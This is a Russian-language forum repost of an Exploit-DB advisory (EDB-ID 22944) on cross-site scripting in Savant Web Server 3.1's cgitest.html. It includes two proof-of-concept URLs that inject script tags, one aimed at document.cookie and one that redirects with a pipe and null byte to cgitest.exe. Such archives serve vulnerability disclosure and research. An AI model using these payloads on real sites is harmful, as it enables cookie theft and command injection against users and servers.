Exploit Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22944
Проверка EDB
  1. Пройдено
Автор
DR_INSANE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2003-07-21
Код:
source: https://www.securityfocus.com/bid/8242/info

cgitest.html has been reported prone to cross-site scripting attacks. The issue occurs due to a lack of sufficient sanitization performed on data supplied to the cgitest.html script.

This issue could be exploited to cause hostile HTML and script code to be rendered in the browser of a user who is enticed to visit a malicious link to the vulnerable script.

http://www.example.com/cgitest.html?<script>wi ndow.location="/cgi-bin/cgitest.exe?|<blahblah>%00";</script>

http://www.example.com/cgitest.html?<script>(document.cookie)</script>
 
Источник
www.exploit-db.com

Похожие темы